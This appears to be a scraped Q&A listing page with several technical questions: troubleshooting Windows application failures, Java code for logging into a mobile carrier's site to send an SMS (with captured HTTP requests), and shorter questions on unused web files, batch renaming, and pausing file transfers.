Memory diagnostic tool: OK CHKDSK returned: 488282111 KB total disk space. 281668248 KB in 265779 files. 150188 KB in 62949 indexes. 0 KB in bad sectors. 571755 KB in use by the system. The log file has occupied 65536 kilobytes. 205891920 KB available on disk. For non-spanish speakers, that means all ok. SMART diagnostic tools (DiskCheckup) report all values normal. temperatures are in the normal range (HWinfo). The event viewer doesn't seem to contain any significant message. ran CCleaner 3, without any noticeable effect. I was thinking about some file number limit (between Visual Studio projects and other applications, there are around 300.000 files on the hard drive), but I couldn't find any. It's possible there is something related with the use of the temporary folders (it's the only explanation I have for why applications fail but Windows doesn't), but I cannot confirm that. Only thing I cannot find out is if chkdsk reporting 65MB for the log is normal. It seems since Vista it always reports this. Any other cleaning/diagnostic tool you might know of? Edit: I ran several other tools since I first published the question: Seagate SeaTools (the HD manufacturer's analysis tool): complete test run OK. Intel Rapid 10.1 (the HD controller manufacturer's troubleshooting tool): the HD's ok. Microsoft Desktop Heap Monitor: Desktop Heap Information Monitor Tool (Version 8.1.2925.0) Copyright (c) Microsoft Corporation. All rights reserved. Session ID: 1 Total Desktop: ( 46464 KB - 11 desktops) WinStation\Desktop Heap Size(KB) Used Rate(%) WinSta0\Winlogon (s1) 128 3.6 WinSta0\Disconnect (s1) 64 3.8 WinSta0\Default (s1) 20480 3.0 msswindowstation\mssrestricteddesk (s0) 1024 0.2 __X78B95_89_IW__A8D9S1_42_ID (s0) 1024 0.2 Service-0x0-3e5$\Default (s0) 1024 0.6 Service-0x0-3e4$\Default (s0) 1024 0.3 Service-0x0-3e7$\Default (s0) 1024 2.1 WinSta0\Winlogon (s0) 128 1.9 WinSta0\Disconnect (s0) 64 3.8 WinSta0\Default (s0) 20480 0.0 All ok, desktop heap usage < 5% Edit 2: I tried totally resetting my account by creating a new one, logging under this new one and delete the first one (local rights and files), then logging back with this deleted account (it is a domain account). No luck. Also, I found out often the error is "not enough storage is available to process this command". Searching on the internet, I found an old troubleshooting tip (setting a registry key to raise the IRP stack limit, whatever it is) which did not change anything.

    Read the article

  • log in and send sms with java

    - by noobed
    I'm trying to log into a site and afterwards to send a SMS (you can do that for free by the site - it's nothing more than just enter some text into some fields and 'submit'). I've used wireshark to track some of the post/get requests that my machine has been exchanging with the server - when using the browser. I'd like to paste some of my Java code: URL url; String urlP = "maccount=myRawUserName7&" + "mpassword=myRawPassword&" + "redirect_http=http&" + "submit=........"; String urlParameters = URLEncoder.encode(urlP, "CP1251"); HttpURLConnection connection = null; // Create connection url = new URL("http://www.mtel.bg/1/mm/smscenter/mc/sendsms/ma/index/mo/1"); connection = (HttpURLConnection) url.openConnection(); connection.setRequestMethod("POST"); //I'm not really sure if these RequestProperties are necessary //so I'll leave them as a comment // connection.setRequestProperty("Content-Type", // "application/x-www-form-urlencoded"); // connection.setRequestProperty("Accept-Charset", "CP1251"); // connection.setRequestProperty("Content-Length", // "" + Integer.toString(urlParameters.getBytes().length)); // connection.setRequestProperty("Content-Language", "en-US"); connection.setUseCaches(false); connection.setDoInput(true); connection.setDoOutput(true); // Send request DataOutputStream wr = new DataOutputStream( connection.getOutputStream()); wr.writeBytes(urlParameters); wr.flush(); wr.close(); String headerName[] = new String[10]; int count = 0; for (int i = 1; (headerName[count] = connection.getHeaderFieldKey(i)) != null; i++) { if (headerName[count].equals("Set-Cookie")) { headerName[count++] = connection.getHeaderField(i); } } //I'm not sure if I have to close the connection here or not if (connection != null) { connection.disconnect(); } //the code above should be the login part //----------------------------------------- //this is copy-pasted from wireshark's info. String smsParam="from=men&" + "sender=0&" + "msisdn=359886737498&" + "tophone=0&" + "smstext=tova+e+proba%21+1.&" + "id=&" + "sendaction=&" + "direction=&" + "msgLen=84"; url = new URL("http://www.mtel.bg/moyat-profil-sms-tsentar_3004/" + "mm/smscenter/mc/sendsms/ma/index"); connection = (HttpURLConnection) url.openConnection(); connection.setRequestMethod("POST"); connection.setRequestProperty("Cookie", headerName[0]); connection.setRequestProperty("Cookie", headerName[1]); //conn urlParameters = URLEncoder.encode(urlP, "CP1251"); connection.setUseCaches(false); connection.setDoInput(true); connection.setDoOutput(true); wr = new DataOutputStream( connection.getOutputStream()); wr.writeBytes(urlParameters); wr.flush(); wr.close(); //I'm not rly sure what exactly to do with this response. // Get Response InputStream is = connection.getInputStream(); BufferedReader rd = new BufferedReader(new InputStreamReader(is, "CP1251")); String line; StringBuffer response = new StringBuffer(); while ((line = rd.readLine()) != null) { response.append(line); response.append('\r'); } rd.close(); System.out.println(response.toString()); if (connection != null) { connection.disconnect(); } so that's my code so far. When I execute it ... I don't receive any text on my phone - so it clearly doesn't work as supposed to. I would appreciate any guidance or remarks. Is my cookie handling wrong? Is my login method wrong? Do I pass the right URLs. Do I encode and send the parameter string correctly? Is there any addition valuable data from these POSTs I should take? P.S. just in any case let me tell you that the username and password is not real. For security reasons I don't want to give valid ones. (I think this is appropriate approach) Here are the POST requests: POST /1/mm/auth/mc/auth/ma/index/mo/1 HTTP/1.1 Host: www.mtel.bg User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Referer: http://www.mtel.bg/1/mm/smscenter/mc/sendsms/ma/index/mo/1 Cookie: __utma=209782857.541729286.1349267381.1349270269.1349274374.3; __utmc=209782857; __utmz=209782857.1349267381.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __atuvc=28%7C40; PHPSESSID=q0mage2usmv34slcv3dmd6t057; __utmb=209782857.3.10.1349274374 Content-Type: multipart/form-data; boundary=---------------------------151901450223722 Content-Length: 475 -----------------------------151901450223722 Content-Disposition: form-data; name="maccount" myRawUserName -----------------------------151901450223722 Content-Disposition: form-data; name="mpassword" myRawPassword -----------------------------151901450223722 Content-Disposition: form-data; name="redirect_https" http -----------------------------151901450223722 Content-Disposition: form-data; name="submit" ........ -----------------------------151901450223722-- HTTP/1.1 302 Found Server: nginx Date: Wed, 03 Oct 2012 14:26:40 GMT Content-Type: text/html; charset=Utf-8 Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Location: /moyat-profil-sms-tsentar_3004/mm/smscenter/mc/sendsms/ma/index Content-Length: 0 The above text is vied with wireshark's follow tcp stream when pressing the log in button. POST /moyat-profil-sms-tsentar_3004/mm/smscenter/mc/sendsms/ma/index HTTP/1.1 *same as the above ones* Referer: http://www.mtel.bg/moyat-profil-sms-tsentar_3004/mm/smscenter/mc/sendsms/ma/index Cookie: __utma=209782857.541729286.1349267381.1349270269.1349274374.3; __utmc=209782857; __utmz=209782857.1349267381.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __atuvc=29%7C40; PHPSESSID=q0mage2usmv34slcv3dmd6t057; __utmb=209782857.4.10.1349274374 Content-Type: application/x-www-form-urlencoded Content-Length: 147 from=men&sender=0&msisdn=35988888888&tophone=0&smstext=this+is+some+FREE+SMS+text%21+100+char+per+sms+only%21&id=&sendaction=&direction=&msgLen=50 HTTP/1.1 302 Found Server: nginx Date: Wed, 03 Oct 2012 14:31:38 GMT Content-Type: text/html; charset=Utf-8 Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Location: /moyat-profil-sms-tsentar_3004/mm/smscenter/mc/sendsms/ma/success/s/1 Content-Length: 0 The above text is when you press the send button.

    Read the article

  • Tool to identify (and remove) unnecessary website files?

    - by xanadont
    Inevitably I'll stop using an antiquated css, script, or image file. Especially when a separate designer is tinkering with things and testing out a few versions of images. Before I build one myself, are there any tools out there that will drill through a website and list unlinked files? Specifically, I'm interested in ASP.NET MVC sites, so detecting calls to (and among many other things) @Url.Content(...) is important.

    Read the article

  • how to rename files with count

    - by nkint
    i have a directory like this: randomized_quad015.png randomized_quad030.png randomized_quad045.png randomized_quad060.png randomized_quad075.png randomized_quad090.png randomized_quad1005.png randomized_quad1020.png randomized_quad1035.png randomized_quad1050.png randomized_quad105.png randomized_quad1065.png randomized_quad1080.png randomized_quad1095.png randomized_quad1110.png randomized_quad1125.png randomized_quad1140.png and i want to rename the first files adding 0 in front of number, like: randomized_quad0015.png but i don't know how.. some help?

    Read the article

  • How to pause/resume transfer of large files?

    - by Olivier Lalonde
    I recently had to copy about 20 GB of data split between about 20 files from my laptop to an external hard drive. Since this operation takes quite a while (at ~560kb/s), I was wondering if there was any way to pause the transfer and resume it later (in case, I need to interrupt the transfer). As a side question, is there any performance difference between copying from the terminal vs copying from Nautilus?

    Read the article

< Previous Page | 223 224 225 226 227 228 229 230 231 232 233 234  | Next Page >